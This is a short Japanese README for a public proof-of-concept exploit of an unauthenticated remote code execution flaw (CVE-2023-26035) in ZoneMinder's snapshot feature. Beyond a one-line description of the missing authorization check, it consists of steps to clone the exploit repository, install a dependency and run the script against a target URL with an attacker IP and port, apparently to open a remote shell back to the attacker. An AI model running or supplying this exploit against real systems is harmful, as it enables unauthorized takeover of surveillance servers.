
ZoneMinder Snapshots における未認証RCE - Poc Exploit
ZoneMinderスナップショットにおける未認証RCE - PoCエクスプロイト
alt img
ZoneMinderのバージョン1.36.33および1.37.33より前のバージョンは、スナップショットアクションにおける認可チェックの欠如により、未認証のリモートコード実行に対して脆弱です。
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR が脆弱性を発見しました。